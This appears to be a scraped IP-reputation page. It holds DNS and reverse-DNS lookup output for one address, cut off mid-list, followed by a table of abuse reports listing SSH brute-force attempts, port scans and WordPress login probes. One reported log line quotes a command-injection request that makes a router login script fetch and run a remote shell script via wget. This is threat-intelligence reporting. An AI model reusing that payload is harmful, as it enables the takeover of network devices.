City: unknown
Region: unknown
Country: United States
Internet Service Provider: unknown
Hostname: unknown
Organization: unknown
Usage Type: unknown
b
; <<>> DiG 9.10.3-P4-Ubuntu <<>> 144.29.99.44
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 3474
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0
;; QUESTION SECTION:
;144.29.99.44. IN A
;; AUTHORITY SECTION:
. 575 IN SOA a.root-servers.net. nstld.verisign-grs.com. 2022021702 1800 900 604800 86400
;; Query time: 21 msec
;; SERVER: 183.60.83.19#53(183.60.83.19)
;; WHEN: Fri Feb 18 12:31:12 CST 2022
;; MSG SIZE rcvd: 105
b';; connection timed out; no servers could be reached
'
;; Truncated, retrying in TCP mode.
Server: 183.60.82.98
Address: 183.60.82.98#53
Non-authoritative answer:
44.99.29.144.in-addr.arpa name = basfcc.com.br.
44.99.29.144.in-addr.arpa name = momentosmagicossuvinil.com.br.
44.99.29.144.in-addr.arpa name = basf-plastic.com.
44.99.29.144.in-addr.arpa name = basfplastics.com.
44.99.29.144.in-addr.arpa name = enertite.com.
44.99.29.144.in-addr.arpa name = luransconstruction.com.
44.99.29.144.in-addr.arpa name = permalath.com.
44.99.29.144.in-addr.arpa name = corearquitetura.com.
44.99.29.144.in-addr.arpa name = redir15.basf.us.
44.99.29.144.in-addr.arpa name = optill.us.
44.99.29.144.in-addr.arpa name = clearfieldsunflowers.com.
44.99.29.144.in-addr.arpa name = basfpaintnews.com.
44.99.29.144.in-addr.arpa name = beckerunderwood.com.
44.99.29.144.in-addr.arpa name = optill.net.
44.99.29.144.in-addr.arpa name = optillherbicide.us.
44.99.29.144.in-addr.arpa name = epsfoam.info.
44.99.29.144.in-addr.arpa name = micuenta.com.ar.
44.99.29.144.in-addr.arpa name = isofoam.com.
44.99.29.144.in-addr.arpa name = acronaloptive.com.
44.99.29.144.in-addr.arpa name = basf-canada.com.
44.99.29.144.in-addr.arpa name = agbciredir.basf.us.
44.99.29.144.in-addr.arpa name = catalyst-selector.basf.com.
44.99.29.144.in-addr.arpa name = basf-pfe.com.
44.99.29.144.in-addr.arpa name = basf.cl.
44.99.29.144.in-addr.arpa name = growsmartcorn.com.
44.99.29.144.in-addr.arpa name = nexicorfungicide.com.
44.99.29.144.in-addr.arpa name = verresta.us.
44.99.29.144.in-addr.arpa name = visionplusonline.com.
44.99.29.144.in-addr.arpa name = walltite.basf.com.
44.99.29.144.in-addr.arpa name = engeniatankmix.com.
44.99.29.144.in-addr.arpa name = treevixherbicide.com.
44.99.29.144.in-addr.arpa name = redir5.basf.us.
44.99.29.144.in-addr.arpa name = pbesupplier.org.
44.99.29.144.in-addr.arpa name = carifend-net.com.
44.99.29.144.in-addr.arpa name = powerfulcleaning.com.
44.99.29.144.in-addr.arpa name = growsmartrewards.com.
44.99.29.144.in-addr.arpa name = basf.com.ar.
44.99.29.144.in-addr.arpa name = casa-s
IP | Type | Details | Datetime |
---|---|---|---|
167.172.64.238 | attackspambots | Port 22 Scan, PTR: None |
2019-12-23 16:15:57 |
58.218.66.88 | attack | Unauthorized connection attempt from IP address 58.218.66.88 on Port 3306(MYSQL) |
2019-12-23 16:39:53 |
118.101.192.81 | attack | Dec 22 22:11:50 hanapaa sshd\[29516\]: Invalid user anita from 118.101.192.81 Dec 22 22:11:50 hanapaa sshd\[29516\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=118.101.192.81 Dec 22 22:11:53 hanapaa sshd\[29516\]: Failed password for invalid user anita from 118.101.192.81 port 20188 ssh2 Dec 22 22:17:59 hanapaa sshd\[30095\]: Invalid user ssh from 118.101.192.81 Dec 22 22:17:59 hanapaa sshd\[30095\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=118.101.192.81 |
2019-12-23 16:38:01 |
154.118.141.90 | attackspam | <6 unauthorized SSH connections |
2019-12-23 16:16:25 |
222.186.175.150 | attack | Dec 23 08:57:54 h2779839 sshd[14941]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=222.186.175.150 user=root Dec 23 08:57:56 h2779839 sshd[14941]: Failed password for root from 222.186.175.150 port 15854 ssh2 Dec 23 08:57:58 h2779839 sshd[14941]: Failed password for root from 222.186.175.150 port 15854 ssh2 Dec 23 08:57:54 h2779839 sshd[14941]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=222.186.175.150 user=root Dec 23 08:57:56 h2779839 sshd[14941]: Failed password for root from 222.186.175.150 port 15854 ssh2 Dec 23 08:57:58 h2779839 sshd[14941]: Failed password for root from 222.186.175.150 port 15854 ssh2 Dec 23 08:57:54 h2779839 sshd[14941]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=222.186.175.150 user=root Dec 23 08:57:56 h2779839 sshd[14941]: Failed password for root from 222.186.175.150 port 15854 ssh2 Dec 23 08:57:58 h2779839 sshd[14941]: Fai ... |
2019-12-23 15:59:22 |
51.255.35.172 | attackbots | 51.255.35.172 - - [23/Dec/2019:08:10:23 +0000] "POST /wp/wp-login.php HTTP/1.1" 200 6239 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0" 51.255.35.172 - - [23/Dec/2019:08:10:23 +0000] "POST /wp/xmlrpc.php HTTP/1.1" 200 403 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0" ... |
2019-12-23 16:31:16 |
165.22.211.73 | attackbots | 2019-12-23T07:44:43.923870shield sshd\[995\]: Invalid user webmaster from 165.22.211.73 port 41350 2019-12-23T07:44:43.928126shield sshd\[995\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=165.22.211.73 2019-12-23T07:44:45.817368shield sshd\[995\]: Failed password for invalid user webmaster from 165.22.211.73 port 41350 ssh2 2019-12-23T07:50:51.385541shield sshd\[3266\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=165.22.211.73 user=root 2019-12-23T07:50:53.129121shield sshd\[3266\]: Failed password for root from 165.22.211.73 port 47762 ssh2 |
2019-12-23 16:05:31 |
41.42.192.186 | attack | 1 attack on wget probes like: 41.42.192.186 - - [23/Dec/2019:00:15:37 +0000] "GET /login.cgi?cli=aa%20aa%27;wget%20http://185.132.53.119/Venom.sh%20-O%20-%3E%20/tmp/kh;Venom.sh%20/tmp/kh%27$ HTTP/1.1" 400 11 |
2019-12-23 16:09:54 |
106.13.6.113 | attackspam | Dec 23 07:29:06 ns381471 sshd[17232]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=106.13.6.113 Dec 23 07:29:08 ns381471 sshd[17232]: Failed password for invalid user yanagawa from 106.13.6.113 port 40084 ssh2 |
2019-12-23 16:24:24 |
112.85.42.171 | attackspam | Dec 23 15:23:52 webhost01 sshd[2112]: Failed password for root from 112.85.42.171 port 50093 ssh2 Dec 23 15:24:05 webhost01 sshd[2112]: error: maximum authentication attempts exceeded for root from 112.85.42.171 port 50093 ssh2 [preauth] ... |
2019-12-23 16:38:27 |
125.86.176.26 | attack | Brute force attempt |
2019-12-23 16:23:26 |
79.115.26.164 | attack | Port 22 Scan, PTR: 79-115-26-164.rdsnet.ro. |
2019-12-23 16:28:53 |
178.33.136.21 | attackspam | Dec 22 21:45:35 wbs sshd\[16037\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=178.33.136.21 user=root Dec 22 21:45:37 wbs sshd\[16037\]: Failed password for root from 178.33.136.21 port 59548 ssh2 Dec 22 21:50:47 wbs sshd\[16546\]: Invalid user asterisk from 178.33.136.21 Dec 22 21:50:47 wbs sshd\[16546\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=178.33.136.21 Dec 22 21:50:49 wbs sshd\[16546\]: Failed password for invalid user asterisk from 178.33.136.21 port 41230 ssh2 |
2019-12-23 16:38:51 |
182.52.28.58 | attackbotsspam | 1577082541 - 12/23/2019 07:29:01 Host: 182.52.28.58/182.52.28.58 Port: 445 TCP Blocked |
2019-12-23 16:29:35 |
192.99.149.195 | attackbotsspam | fail2ban honeypot |
2019-12-23 16:35:34 |